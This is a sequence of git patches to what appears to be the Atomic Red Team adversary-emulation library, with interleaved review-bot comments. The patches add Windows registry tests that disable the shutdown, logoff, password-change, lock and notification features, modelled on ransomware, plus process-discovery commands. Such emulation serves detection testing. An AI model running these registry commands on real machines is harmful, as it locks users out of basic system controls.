af254e70-dd0e-4de6-9afe-a994d9ea8b62 +c0d6d67f-1f63-42cc-95c0-5fd6b20082ad +6e0d1131-2d7e-4905-8ca5-d6172f05d03d +e246578a-c24d-46a7-9237-0213ff86fb0c +d4a6da40-618f-454d-9a9e-26af552aaeb0 +3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 From 052cae4391b32d3b99793d3f2d38de5fd0f47e3e Mon Sep 17 00:00:00 2001 
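Review bot: The cleanup for the 'Disable Windows Shutdown Button' test deletes `shutdownwithoutlogon` under HKEY_LOCAL_MACHINE\...\Policies\System, but that value typically already exists on a stock Windows client (set to 1), so `reg delete` leaves the host in a state it was never in before the test rather than restoring it; a restore such as `reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 1 /f >nul 2>&1` would be closer to the original state (or the test could record the pre-existing value before changing it). The same test's description says it modifies "the registry of the currently logged in user", which is carried over from the HKCU tests and does not match the HKLM key it actually writes. The other four tests write only under HKEY_CURRENT_USER, where deleting a value that did not exist beforehand is an acceptable cleanup. The file also ends without a trailing newline after the last `elevation_required: true`.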
From: CircleCI Atomic Red Team doc generator Date: Mon, 14 Mar 2022 18:01:13 +0000 Subject: [PATCH 43/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 5 + atomics/Indexes/Indexes-CSV/windows-index.csv | 5 + atomics/Indexes/Indexes-Markdown/index.md | 5 + .../Indexes/Indexes-Markdown/windows-index.md | 5 + atomics/Indexes/index.yaml | 88 +++++++++ atomics/T1112/T1112.md | 177 ++++++++++++++++++ 6 files changed, 285 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ce20a74d..4dbe8fde 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -482,6 +482,11 @@ defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt +defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt +defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt +defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt +defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt +defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 659b4ea5..5b5eadf1 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -313,6 +313,11 @@ defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt +defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt +defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt +defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt +defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt +defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 6a8d8e45..f94c7bc5 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -757,6 +757,11 @@ - Atomic Test #9: Disable Windows Registry Tool [windows] - Atomic Test #10: Disable Windows CMD application [windows] - Atomic Test #11: Disable Windows Task Manager application [windows] + - Atomic Test #12: Disable Windows Notification Center [windows] + - Atomic Test #13: Disable Windows Shutdown Button [windows] + - Atomic Test #14: Disable Windows LogOff Button [windows] + - Atomic Test #15: Disable Windows Change Password Feature [windows] + - Atomic Test #16: Disable Windows Lock Workstation Feature [windows] - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 79be6688..b500a3c2 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -525,6 +525,11 @@ - Atomic Test #9: Disable Windows Registry Tool [windows] - Atomic Test #10: Disable Windows CMD application [windows] - Atomic Test #11: Disable Windows Task Manager application [windows] + - Atomic Test #12: Disable Windows Notification Center [windows] + - Atomic Test #13: Disable Windows Shutdown Button [windows] + - Atomic Test #14: Disable Windows LogOff Button [windows] + - Atomic Test #15: Disable Windows Change Password Feature [windows] + - Atomic Test #16: Disable Windows Lock Workstation Feature [windows] - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index cd75cde6..def15a93 100644 --- a/atomics/Indexes/index.yaml 
+++ b/atomics/Indexes/index.yaml 
@@ -31778,6 +31778,94 @@ defense-evasion: cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1 +' + name: command_prompt + elevation_required: true + - name: Disable Windows Notification Center + auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center. + See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html + supported_platforms: + - windows + executor: + command: 'reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer + /v DisableNotificationCenter /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer + /v DisableNotificationCenter /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Disable Windows Shutdown Button + auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button. 
+ See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" + /v shutdownwithoutlogon /t REG_DWORD /d 0 /f + +' + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" + /v shutdownwithoutlogon /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Disable Windows LogOff Button + auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button. + See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2 + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1 + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1 + name: command_prompt + elevation_required: true + - name: Disable Windows Change Password Feature + auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature. 
+ See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" + /v DisableChangePassword /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" + /v DisableChangePassword /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Disable Windows Lock Workstation Feature + auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature. + See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/ + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" + /v DisableLockWorkstation /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" + /v DisableLockWorkstation /f >nul 2>&1 + ' name: command_prompt elevation_required: true diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index aed60f59..921e28c8 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md 
@@ -32,6 +32,16 @@ The Registry of a remote system may be modified to aid in execution of files as - [Atomic Test #11 - Disable Windows Task Manager application](#atomic-test-11---disable-windows-task-manager-application) +- [Atomic Test #12 - Disable Windows Notification Center](#atomic-test-12---disable-windows-notification-center) + +- [Atomic Test #13 - Disable Windows Shutdown Button](#atomic-test-13---disable-windows-shutdown-button) + +- [Atomic Test #14 - Disable Windows LogOff Button](#atomic-test-14---disable-windows-logoff-button) + +- [Atomic Test #15 - Disable Windows Change Password Feature](#atomic-test-15---disable-windows-change-password-feature) + +- [Atomic Test #16 - Disable Windows Lock Workstation Feature](#atomic-test-16---disable-windows-lock-workstation-feature) +
@@ -441,4 +451,171 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies +
+
+ +## Atomic Test #12 - Disable Windows Notification Center +Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center. +See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html + +**Supported Platforms:** Windows + + +**auto_generated_guid:** c0d6d67f-1f63-42cc-95c0-5fd6b20082ad + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #13 - Disable Windows Shutdown Button +Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button. +See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 6e0d1131-2d7e-4905-8ca5-d6172f05d03d + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #14 - Disable Windows LogOff Button +Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button. +See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2 + +**Supported Platforms:** Windows + + +**auto_generated_guid:** e246578a-c24d-46a7-9237-0213ff86fb0c + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1 +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #15 - Disable Windows Change Password Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature. +See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d4a6da40-618f-454d-9a9e-26af552aaeb0 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #16 - Disable Windows Lock Workstation Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature. +See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/ + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1 +``` + + + + +
From 9dc726b495ad25fb2534eb42252465128043fba7 Mon Sep 17 00:00:00 2001 From: Araveti Esanya Reddy Date: Mon, 14 Mar 2022 23:32:17 +0530 Subject: [PATCH 44/83] updated as per review commets --- atomics/T1562.008/T1562.008.yaml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index 5f70a039..53d5f696 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1562.008/T1562.008.yaml @@ -83,10 +83,6 @@ atomic_tests: $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd Connect-AzureAD -Credential $creds New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name} - cleanup_command: | - $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force - $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd - Connect-AzureAD -Credential $creds Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name} name: powershell elevation_required: false From 85ea448d3b7b5e1af46ca019b373b7807ca5d010 Mon Sep 17 00:00:00 2001 From: Tim Schulz <78771434+automate-tim@users.noreply.github.com> Date: Mon, 14 Mar 2022 14:07:08 -0400 Subject: [PATCH 45/83] Added procedural variation to include PowerShell execution and WMIC (#1801) * Added procedural variation to include PowerShell execution and WMIC * Removed empty GUID lines * Changed wmic to only command_prompt instead of powershell and command_prompt Co-authored-by: Tim Schulz Co-authored-by: Carrie Roberts --- atomics/T1057/T1057.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) diff --git a/atomics/T1057/T1057.yaml b/atomics/T1057/T1057.yaml index ee79c755..2142182a 100644 --- a/atomics/T1057/T1057.yaml +++ b/atomics/T1057/T1057.yaml 
@@ -34,4 +34,36 @@ atomic_tests: command: | tasklist name: command_prompt +- name: Process Discovery - Get-Process + description: | + Utilize Get-Process PowerShell cmdlet to identify processes. + Upon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout. + supported_platforms: + - windows + executor: + command: | + Get-Process + name: powershell +- name: Process Discovery - get-wmiObject + description: | + Utilize get-wmiObject PowerShell cmdlet to identify processes. + + Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout. + supported_platforms: + - windows + executor: + command: | + get-wmiObject -class Win32_Process + name: powershell +- name: Process Discovery - wmic process + description: | + Utilize windows management instrumentation to identify processes. + + Upon successful execution, WMIC will execute process to list processes. Output will be via stdout. + supported_platforms: + - windows + executor: + command: | + wmic process get /format:list + name: command_prompt \ No newline at end of file From 3ce01207ea6da04d610471f9942c6f2f52aeb235 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 14 Mar 2022 18:07:38 +0000 Subject: [PATCH 46/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1057/T1057.yaml | 3 +++ atomics/used_guids.txt | 3 +++ 2 files changed, 6 insertions(+) diff --git a/atomics/T1057/T1057.yaml b/atomics/T1057/T1057.yaml index 2142182a..e3939596 100644 --- a/atomics/T1057/T1057.yaml +++ b/atomics/T1057/T1057.yaml @@ -35,6 +35,7 @@ atomic_tests: tasklist name: command_prompt - name: Process Discovery - Get-Process + auto_generated_guid: 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 description: | Utilize Get-Process PowerShell cmdlet to identify processes. 
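Review bot: `get-wmiObject -class Win32_Process` in the 'Process Discovery - get-wmiObject' test depends on a cmdlet that exists only in Windows PowerShell 5.1 and was not carried into PowerShell 6+/7, so under a pwsh executor the test fails with a command-not-found error rather than exercising the technique; either state that requirement in the description or use the CIM equivalent `Get-CimInstance -ClassName Win32_Process`, which runs on both. The cmdlet and parameter are also written in non-canonical case where the file otherwise uses `Get-Process`; `Get-WmiObject -Class Win32_Process` would match. WMIC is likewise deprecated in current Windows releases, so a short sentence in the 'wmic process' description noting that the utility may be absent on newer builds would let an operator read a failure correctly. The last line of the file is missing a trailing newline.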
@@ -46,6 +47,7 @@ atomic_tests: Get-Process name: powershell - name: Process Discovery - get-wmiObject + auto_generated_guid: b51239b4-0129-474f-a2b4-70f855b9f2c2 description: | Utilize get-wmiObject PowerShell cmdlet to identify processes. @@ -57,6 +59,7 @@ atomic_tests: get-wmiObject -class Win32_Process name: powershell - name: Process Discovery - wmic process + auto_generated_guid: 640cbf6d-659b-498b-ba53-f6dd1a1cc02c description: | Utilize windows management instrumentation to identify processes. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index abb3c088..4b8e9e76 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -908,3 +908,6 @@ c0d6d67f-1f63-42cc-95c0-5fd6b20082ad e246578a-c24d-46a7-9237-0213ff86fb0c d4a6da40-618f-454d-9a9e-26af552aaeb0 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 +3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 +b51239b4-0129-474f-a2b4-70f855b9f2c2 +640cbf6d-659b-498b-ba53-f6dd1a1cc02c From 6b82fe5136fc96a5e76db5ea6020e4a1c7187ac5 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 14 Mar 2022 18:07:44 +0000 Subject: [PATCH 47/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 3 + atomics/Indexes/Indexes-CSV/windows-index.csv | 3 + atomics/Indexes/Indexes-Markdown/index.md | 3 + .../Indexes/Indexes-Markdown/windows-index.md | 3 + atomics/Indexes/index.yaml | 36 +++++++ atomics/T1057/T1057.md | 96 +++++++++++++++++++ 6 files changed, 144 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 4dbe8fde..c617160d 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -863,6 +863,9 @@ discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt +discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell +discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell +discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 5b5eadf1..0f3cc867 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -584,6 +584,9 @@ discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177 discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt +discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell +discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell +discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f94c7bc5..b2590017 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1378,6 +1378,9 @@ - [T1057 Process Discovery](../../T1057/T1057.md) - Atomic Test #1: Process Discovery - ps [macos, linux] - Atomic Test #2: Process Discovery - tasklist [windows] + - Atomic Test #3: Process Discovery - Get-Process [windows] + - Atomic Test #4: Process Discovery - get-wmiObject [windows] + - Atomic Test #5: Process Discovery - wmic process [windows] - [T1012 Query Registry](../../T1012/T1012.md) - Atomic Test #1: Query Registry [windows] - [T1018 Remote System Discovery](../../T1018/T1018.md) 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index b500a3c2..e82acf47 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -980,6 +980,9 @@ - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1057 Process Discovery](../../T1057/T1057.md) - Atomic Test #2: Process Discovery - tasklist [windows] + - Atomic Test #3: Process Discovery - Get-Process [windows] + - Atomic Test #4: Process Discovery - get-wmiObject [windows] + - Atomic Test #5: Process Discovery - wmic process [windows] - [T1012 Query Registry](../../T1012/T1012.md) - Atomic Test #1: Query Registry [windows] - [T1018 Remote System Discovery](../../T1018/T1018.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index def15a93..8ec9b797 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -57394,6 +57394,42 @@ discovery: executor: command: 'tasklist +' + name: command_prompt + - name: Process Discovery - Get-Process + auto_generated_guid: 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 + description: "Utilize Get-Process PowerShell cmdlet to identify processes.\n\nUpon + successful execution, powershell.exe will execute Get-Process to list processes. + Output will be via stdout. \n" + supported_platforms: + - windows + executor: + command: 'Get-Process + +' + name: powershell + - name: Process Discovery - get-wmiObject + auto_generated_guid: b51239b4-0129-474f-a2b4-70f855b9f2c2 + description: "Utilize get-wmiObject PowerShell cmdlet to identify processes.\n\nUpon + successful execution, powershell.exe will execute get-wmiObject to list processes. + Output will be via stdout. \n" + supported_platforms: + - windows + executor: + command: 'get-wmiObject -class Win32_Process + +' + name: powershell + - name: Process Discovery - wmic process + auto_generated_guid: 640cbf6d-659b-498b-ba53-f6dd1a1cc02c + description: "Utilize windows management instrumentation to identify processes.\n\nUpon + successful execution, WMIC will execute process to list processes. Output + will be via stdout. \n" + supported_platforms: + - windows + executor: + command: 'wmic process get /format:list + ' name: command_prompt T1012: diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md index 68e6c297..96b72803 100644 --- a/atomics/T1057/T1057.md +++ b/atomics/T1057/T1057.md 
@@ -10,6 +10,12 @@ In Windows environments, adversaries could obtain details on running processes u - [Atomic Test #2 - Process Discovery - tasklist](#atomic-test-2---process-discovery---tasklist) +- [Atomic Test #3 - Process Discovery - Get-Process](#atomic-test-3---process-discovery---get-process) + +- [Atomic Test #4 - Process Discovery - get-wmiObject](#atomic-test-4---process-discovery---get-wmiobject) + +- [Atomic Test #5 - Process Discovery - wmic process](#atomic-test-5---process-discovery---wmic-process) +
@@ -80,4 +86,94 @@ tasklist +
+
+ +## Atomic Test #3 - Process Discovery - Get-Process +Utilize Get-Process PowerShell cmdlet to identify processes. + +Upon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Get-Process +``` + + + + + + +
+
